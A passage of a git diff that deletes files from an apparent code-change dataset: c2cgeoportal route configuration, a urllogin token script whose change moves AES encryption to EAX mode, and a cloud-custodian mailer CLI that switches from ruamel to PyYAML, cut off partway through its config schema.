net in self.private_networks: - if ip in net: - return False - return True - - @staticmethod - def phash(): # pragma: no cover - return "" - - -class MapserverproxyRoutePredicate: - """ Serve as a custom route predicate function for mapserverproxy. - If the hide_capabilities setting is set and is true then we want to - return 404s on GetCapabilities requests.""" - - def __init__(self, val, config): - pass - - def __call__(self, context, request): - hide_capabilities = request.registry.settings.get("hide_capabilities") - if not hide_capabilities: - return True - params = dict( - (k.lower(), v.lower()) for k, v in request.params.items() - ) - return "request" not in params or params["request"] != "getcapabilities" - - @staticmethod - def phash(): - return "" - - -def add_cors_route(config, pattern, service): - """ - Add the OPTIONS route and view need for services supporting CORS. - """ - def view(request): # pragma: no cover - from c2cgeoportal_geoportal.lib.caching import set_common_headers, NO_CACHE - return set_common_headers(request, service, NO_CACHE) - - name = pattern + "_options" - config.add_route(name, pattern, request_method="OPTIONS") - config.add_view(view, route_name=name) - - -def error_handler(http_exception, request): # pragma: no cover - """ - View callable for handling all the exceptions that are not already handled. - """ - log.warning("%s returned status code %s", request.url, - http_exception.status_code) - return caching.set_common_headers( - request, "error", caching.NO_CACHE, http_exception, vary=True - ) - - -def call_hook(settings, name, *args, **kwargs): - hooks = settings.get("hooks", {}) - hook = hooks.get(name) - if hook is None: - return - parts = hook.split(".") - module = importlib.import_module(".".join(parts[0:-1])) - function = getattr(module, parts[-1]) - function(*args, **kwargs) - - -def includeme(config): - """ - This function returns a Pyramid WSGI application. - """ - - settings = config.get_settings() - - config.include("c2cgeoportal_commons") - - call_hook(settings, "after_settings", settings) - - get_user_from_request = create_get_user_from_request(settings) - config.add_request_method(get_user_from_request, name="user", property=True) - config.add_request_method(get_user_from_request, name="get_user") - - # Configure 'locale' dir as the translation dir for c2cgeoportal app - config.add_translation_dirs("c2cgeoportal_geoportal:locale/") - - config.include('c2cwsgiutils.pyramid.includeme') - health_check = HealthCheck(config) - - # Initialise DBSessions - init_dbsessions(settings, config, health_check) - - # Initialize the dbreflection module - dbreflection.init() - - checker.init(config, health_check) - check_collector.init(config, health_check) - - # dogpile.cache configuration - if 'cache' in settings: - caching.init_region(settings['cache']) - from c2cgeoportal_commons.models.main import InvalidateCacheEvent - - @zope.event.classhandler.handler(InvalidateCacheEvent) - def handle(event: InvalidateCacheEvent): - del event - caching.invalidate_region() - - # Register a tween to get back the cache buster path. - config.add_tween("c2cgeoportal_geoportal.lib.cacheversion.CachebusterTween") - config.add_tween("c2cgeoportal_geoportal.lib.webpack.WebpackTween") - - # Bind the mako renderer to other file extensions - add_mako_renderer(config, ".html") - add_mako_renderer(config, ".js") - - # Add the "geojson" renderer - config.add_renderer("geojson", GeoJSON()) - - # Add decimal json renderer - config.add_renderer("decimaljson", DecimalJSON()) - - # Add the "xsd" renderer - config.add_renderer("xsd", XSD( - sequence_callback=dbreflection.xsd_sequence_callback - )) - - # Add the set_user_validator directive, and set a default user validator - config.add_directive("set_user_validator", set_user_validator) - config.set_user_validator(default_user_validator) - - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - config.add_route('dynamic', '/dynamic.js', request_method="GET") - config.add_view( - Entry, - attr="get_ngeo_index_vars", - route_name='dynamic', - renderer='/dynamic.js' - ) - if settings.get("ogcproxy_enable", False): # pragma: no cover - # Add an OGCProxy view - config.add_route_predicate("ogc_server", OgcproxyRoutePredicate) - config.add_route( - "ogcproxy", "/ogcproxy", - ogc_server=True - ) - config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy") - - # Add routes to the mapserver proxy - config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate) - config.add_route( - "mapserverproxy", "/mapserv_proxy", - mapserverproxy=True, pregenerator=C2CPregenerator(role=True), - ) - - # Add route to the tinyows proxy - config.add_route( - "tinyowsproxy", "/tinyows_proxy", - pregenerator=C2CPregenerator(role=True), - ) - - # Add routes to csv view - config.add_route("csvecho", "/csv", request_method="POST") - - # Add route to the export GPX/KML view - config.add_route("exportgpxkml", "/exportgpxkml") - - # Add routes to the echo service - config.add_route("echo", "/echo", request_method="POST") - - # Add routes to the entry view class - config.add_route("base", "/", static=True) - config.add_route("loginform", "/login.html", request_method="GET") - add_cors_route(config, "/login", "login") - config.add_route("login", "/login", request_method="POST") - add_cors_route(config, "/logout", "login") - config.add_route("logout", "/logout", request_method="GET") - add_cors_route(config, "/loginchange", "login") - config.add_route("loginchange", "/loginchange", request_method="POST") - add_cors_route(config, "/loginresetpassword", "login") - config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST") - add_cors_route(config, "/loginuser", "login") - config.add_route("loginuser", "/loginuser", request_method="GET") - config.add_route("testi18n", "/testi18n.html", request_method="GET") - config.add_route("apijs", "/api.js", request_method="GET") - config.add_route("xapijs", "/xapi.js", request_method="GET") - config.add_route("apihelp", "/apihelp.html", request_method="GET") - config.add_route("xapihelp", "/xapihelp.html", request_method="GET") - config.add_route( - "themes", "/themes", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route("invalidate", "/invalidate", request_method="GET") - - # Print proxy routes - config.add_route("printproxy", "/printproxy", request_method="HEAD") - add_cors_route(config, "/printproxy/*all", "print") - config.add_route( - "printproxy_capabilities", "/printproxy/capabilities.json", - request_method="GET", pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_report_create", "/printproxy/report.{format}", - request_method="POST", header=JSON_CONTENT_TYPE - ) - config.add_route( - "printproxy_status", "/printproxy/status/{ref}.json", - request_method="GET" - ) - config.add_route( - "printproxy_cancel", "/printproxy/cancel/{ref}", - request_method="DELETE" - ) - config.add_route( - "printproxy_report_get", "/printproxy/report/{ref}", - request_method="GET" - ) - # For v2 - config.add_route( - "printproxy_info", "/printproxy/info.json", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "printproxy_create", "/printproxy/create.json", - request_method="POST", - ) - config.add_route( - "printproxy_get", "/printproxy/{file}.printout", - request_method="GET", - ) - - # Full-text search routes - add_cors_route(config, "/fulltextsearch", "fulltextsearch") - config.add_route("fulltextsearch", "/fulltextsearch") - - # Access to raster data - add_cors_route(config, "/raster", "raster") - config.add_route("raster", "/raster", request_method="GET") - - add_cors_route(config, "/profile.{ext}", "profile") - config.add_route("profile.csv", "/profile.csv", request_method="POST") - config.add_route("profile.json", "/profile.json", request_method="POST") - - # Shortener - add_cors_route(config, "/short/create", "shortener") - config.add_route("shortener_create", "/short/create", request_method="POST") - config.add_route("shortener_get", "/short/{ref}", request_method="GET") - - # Geometry processing - config.add_route("difference", "/difference", request_method="POST") - - # PDF report tool - config.add_route("pdfreport", "/pdfreport/{layername}/{ids}", request_method="GET") - - # Add routes for the "layers" web service - add_cors_route(config, "/layers/*all", "layers") - config.add_route( - "layers_count", "/layers/{layer_id:\\d+}/count", - request_method="GET" - ) - config.add_route( - "layers_metadata", "/layers/{layer_id:\\d+}/md.xsd", - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_route( - "layers_read_many", - "/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}", - request_method="GET") # supports URLs like /layers/1,2,3 - config.add_route( - "layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="GET") - config.add_route( - "layers_create", "/layers/{layer_id:\\d+}", - request_method="POST", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_update", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="PUT", header=JSON_CONTENT_TYPE) - config.add_route( - "layers_delete", "/layers/{layer_id:\\d+}/{feature_id}", - request_method="DELETE") - config.add_route( - "layers_enumerate_attribute_values", - "/layers/{layer_name}/values/{field_name}", - request_method="GET", - pregenerator=C2CPregenerator(), - ) - # There is no view corresponding to that route, it is to be used from - # mako templates to get the root of the "layers" web service - config.add_route("layers_root", "/layers/", request_method="HEAD") - - # Resource proxy (load external url, useful when loading non https content) - config.add_route("resourceproxy", "/resourceproxy", request_method="GET") - - # Scan view decorator for adding routes - config.scan(ignore=["c2cgeoportal_geoportal.scripts", "c2cgeoportal_geoportal.wsgi_app"]) - - if "subdomains" in settings: # pragma: no cover - config.registry.registerUtility( - MultiDomainStaticURLInfo(), IStaticURLInfo) - - # Add the static view (for static resources) - _add_static_view(config, "static", "c2cgeoportal_geoportal:static") - _add_static_view(config, "project", "c2cgeoportal_geoportal:project") - - add_admin_interface(config) - add_static_view(config) - - # Handles the other HTTP errors raised by the views. Without that, - # the client receives a status=200 without content. - config.add_view(error_handler, context=HTTPException) - - -def init_dbsessions(settings: dict, config: Configurator, health_check: HealthCheck=None) -> None: - db_chooser = settings.get('db_chooser', {}) - master_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('master', [])] - slave_paths = [re.compile(i.replace('//', '/')) for i in db_chooser.get('slave', [])] - - slave_prefix = 'sqlalchemy_slave' if 'sqlalchemy_slave.url' in settings else None - - c2cgeoportal_commons.models.DBSession, rw_bind, _ = c2cwsgiutils.db.setup_session( - config, 'sqlalchemy', slave_prefix, force_master=master_paths, force_slave=slave_paths) - c2cgeoportal_commons.models.Base.metadata.bind = rw_bind - c2cgeoportal_commons.models.DBSessions['dbsession'] = c2cgeoportal_commons.models.DBSession - - for dbsession_name, dbsession_config in settings.get('dbsessions', {}).items(): # pragma: nocover - c2cgeoportal_commons.models.DBSessions[dbsession_name] = \ - c2cwsgiutils.db.create_session(config, dbsession_name, **dbsession_config) - - c2cgeoportal_commons.models.Base.metadata.clear() - from c2cgeoportal_commons.models import main - - if health_check is not None: - for name, session in c2cgeoportal_commons.models.DBSessions.items(): - if name == 'dbsession': - health_check.add_db_session_check(session, at_least_one_model=main.Theme) - else: # pragma: no cover - def check(session: Session) -> None: - session.execute('SELECT 1') - health_check.add_db_session_check(session, query_cb=check) diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff deleted file mode 100644 index a016355..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff +++ /dev/null @@ -1,20 +0,0 @@ -diff --git a/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py b/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py - index 290aac93ed6e3874bb3789b0f5a0852b68cc47fe..14388c3d85ab164d7b36b1331534913a1c9d6c9a 100644 - --- a/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py - +++ b/geoportal/c2cgeoportal_geoportal/scripts/urllogin.py -@@ -45,12 +45,13 @@ def create_token(aeskey, user, password, valid): - if aeskey is None: - print("urllogin is not configured") - exit(1) -- cipher = AES.new(aeskey) -+ cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX) - data = json.dumps(auth) - mod_len = len(data) % 16 - if mod_len != 0: - data += "".join([" " for i in range(16 - mod_len)]) -- return binascii.hexlify(cipher.encrypt(data.encode("utf-8"))).decode("utf-8") -+ ciphertext, tag = cipher.encrypt_and_digest(data.encode("utf-8")) -+ return binascii.hexlify(cipher.nonce + tag + ciphertext).decode("ascii") - - - def main(): diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py deleted file mode 100644 index 4ef637d..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py +++ /dev/null @@ -1,72 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2017-2018, Camptocamp SA -# All rights reserved. - -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. - -import argparse -import time -import json -import binascii -import c2c.template -from Crypto.Cipher import AES - - -def create_token(aeskey, user, password, valid): - auth = { - "u": user, - "p": password, - "t": int(time.time()) + valid * 3600 * 24, - } - - if aeskey is None: - print("urllogin is not configured") - exit(1) - cipher = AES.new(aeskey) - data = json.dumps(auth) - mod_len = len(data) % 16 - if mod_len != 0: - data += "".join([" " for i in range(16 - mod_len)]) - return binascii.hexlify(cipher.encrypt(data.encode("utf-8"))).decode("utf-8") - - -def main(): - parser = argparse.ArgumentParser(description="Generate an auth token") - parser.add_argument("user", help="The username") - parser.add_argument("password", help="The password") - parser.add_argument("valid", type=int, default=1, nargs='?', help="Is valid for, in days") - - args = parser.parse_args() - config = c2c.template.get_config("config.yaml") - urllogin = config.get('urllogin', {}) - aeskey = urllogin.get("aes_key") - auth_enc = create_token(aeskey, args.user, args.password, args.valid) - - print(("Use: auth={}".format(auth_enc))) - - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py deleted file mode 100644 index 3a7dbef..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py +++ /dev/null @@ -1,73 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2017-2018, Camptocamp SA -# All rights reserved. - -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. - -import argparse -import time -import json -import binascii -import c2c.template -from Crypto.Cipher import AES - - -def create_token(aeskey, user, password, valid): - auth = { - "u": user, - "p": password, - "t": int(time.time()) + valid * 3600 * 24, - } - - if aeskey is None: - print("urllogin is not configured") - exit(1) - cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX) - data = json.dumps(auth) - mod_len = len(data) % 16 - if mod_len != 0: - data += "".join([" " for i in range(16 - mod_len)]) - ciphertext, tag = cipher.encrypt_and_digest(data.encode("utf-8")) - return binascii.hexlify(cipher.nonce + tag + ciphertext).decode("ascii") - - -def main(): - parser = argparse.ArgumentParser(description="Generate an auth token") - parser.add_argument("user", help="The username") - parser.add_argument("password", help="The password") - parser.add_argument("valid", type=int, default=1, nargs='?', help="Is valid for, in days") - - args = parser.parse_args() - config = c2c.template.get_config("config.yaml") - urllogin = config.get('urllogin', {}) - aeskey = urllogin.get("aes_key") - auth_enc = create_token(aeskey, args.user, args.password, args.valid) - - print(("Use: auth={}".format(auth_enc))) - - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff deleted file mode 100644 index 0921114..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff +++ /dev/null @@ -1,18 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/cli.py b/tools/c7n_mailer/c7n_mailer/cli.py - index 9f02c55e03a4ad372fdc9632b64491d93787dc94..12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 100644 - --- a/tools/c7n_mailer/c7n_mailer/cli.py - +++ b/tools/c7n_mailer/c7n_mailer/cli.py -@@ -7,12 +7,12 @@ from os import path - - import boto3 - import jsonschema -+import yaml - from c7n_mailer import deploy, utils - from c7n_mailer.azure_mailer.azure_queue_processor import MailerAzureQueueProcessor - from c7n_mailer.azure_mailer import deploy as azure_deploy - from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor - from c7n_mailer.utils import get_provider, Providers --from ruamel import yaml - - AZURE_KV_SECRET_SCHEMA = { - 'type': 'object', diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py deleted file mode 100644 index 2613a18..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py +++ /dev/null @@ -1,257 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import functools -import logging -from os import path - -import boto3 -import jsonschema -from c7n_mailer import deploy, utils -from c7n_mailer.azure_mailer.azure_queue_processor import MailerAzureQueueProcessor -from c7n_mailer.azure_mailer import deploy as azure_deploy -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor -from c7n_mailer.utils import get_provider, Providers -from ruamel import yaml - -AZURE_KV_SECRET_SCHEMA = { - 'type': 'object', - 'properties': { - 'type': {'enum': ['azure.keyvault']}, - 'secret': {'type': 'string'} - }, - 'required': ['type', 'secret'], - 'additionalProperties': False -} - -SECURED_STRING_SCHEMA = { - 'oneOf': [ - {'type': 'string'}, - AZURE_KV_SECRET_SCHEMA - ] -} - -CONFIG_SCHEMA = { - '$schema': 'http://json-schema.org/draft-07/schema', - 'id': 'https://schema.cloudcustodian.io/v0/mailer.json', - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'org_domain': {'type': 'string'}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - 'lambda_name': {'type': 'string'}, - 'lambda_description': {'type': 'string'}, - 'lambda_tags': {'type': 'object'}, - 'lambda_schedule': {'type': 'string'}, - - # Azure Function Config - 'function_properties': { - 'type': 'object', - 'appInsights': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'storageAccount': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'servicePlan': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string', - 'skuTier': 'string', - 'skuName': 'string'} - } - ] - }, - }, - 'function_schedule': {'type': 'string'}, - 'function_skuCode': {'type': 'string'}, - 'function_sku': {'type': 'string'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': SECURED_STRING_SCHEMA, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - 'datadog_api_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'datadog_application_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'slack_token': {'type': 'string'}, - 'slack_webhook': {'type': 'string'}, - 'sendgrid_api_key': SECURED_STRING_SCHEMA, - 'splunk_hec_url': {'type': 'string'}, - 'splunk_hec_token': {'type': 'string'}, - 'splunk_remove_paths': { - 'type': 'array', - 'items': {'type': 'string'} - }, - 'splunk_actions_list': {'type': 'boolean'}, - 'splunk_max_attempts': {'type': 'integer'}, - 'splunk_hec_max_length': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'}, - - # Mapping account / emails - 'account_emails': {'type': 'object'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', type=int, help=max_num_processes_help_msg) - templates_folder_help_msg = 'message templates folder location' - parser.add_argument('-t', '--templates', help=templates_folder_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(processor, max_num_processes): - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - processor.max_num_processes = max_num_processes - processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - - module_dir = path.dirname(path.abspath(__file__)) - default_templates = [path.abspath(path.join(module_dir, 'msg-templates')), - path.abspath(path.join(module_dir, '..', 'msg-templates')), - path.abspath('.')] - templates = args_dict.get('templates', None) - if templates: - default_templates.append(path.abspath(path.expanduser(path.expandvars(templates)))) - - mailer_config['templates_folders'] = default_templates - - provider = get_provider(mailer_config) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported ' - 'with --run, not --update-lambda **\n') - return - - if provider == Providers.Azure: - azure_deploy.provision(mailer_config) - elif provider == Providers.AWS: - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - - # Select correct processor - if provider == Providers.Azure: - processor = MailerAzureQueueProcessor(mailer_config, logger) - elif provider == Providers.AWS: - aws_session = session_factory(mailer_config) - processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - - # Execute - if max_num_processes: - run_mailer_in_parallel(processor, max_num_processes) - else: - processor.run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py deleted file mode 100644 index 0377b6f..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py +++ /dev/null @@ -1,257 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import functools -import logging -from os import path - -import boto3 -import jsonschema -import yaml -from c7n_mailer import deploy, utils -from c7n_mailer.azure_mailer.azure_queue_processor import MailerAzureQueueProcessor -from c7n_mailer.azure_mailer import deploy as azure_deploy -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor -from c7n_mailer.utils import get_provider, Providers - -AZURE_KV_SECRET_SCHEMA = { - 'type': 'object', - 'properties': { - 'type': {'enum': ['azure.keyvault']}, - 'secret': {'type': 'string'} - }, - 'required': ['type', 'secret'], - 'additionalProperties': False -} - -SECURED_STRING_SCHEMA = { - 'oneOf': [ - {'type': 'string'}, - AZURE_KV_SECRET_SCHEMA - ] -} - -CONFIG_SCHEMA = { - '$schema': 'http://json-schema.org/draft-07/schema', - 'id': 'https://schema.cloudcustodian.io/v0/mailer.json', - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'org_domain': {'type': 'string'}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - 'lambda_name': {'type': 'string'}, - 'lambda_description': {'type': 'string'}, - 'lambda_tags': {'type': 'object'}, - 'lambda_schedule': {'type': 'string'}, - - # Azure Function Config - 'function_properties': { - 'type': 'object', - 'appInsights': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'storageAccount': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'servicePlan': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string', - 'skuTier': 'string', - 'skuName': 'string'} - } - ] - }, - }, - 'function_schedule': {'type': 'string'}, - 'function_skuCode': {'type': 'string'}, - 'function_sku': {'type': 'string'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': SECURED_STRING_SCHEMA, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 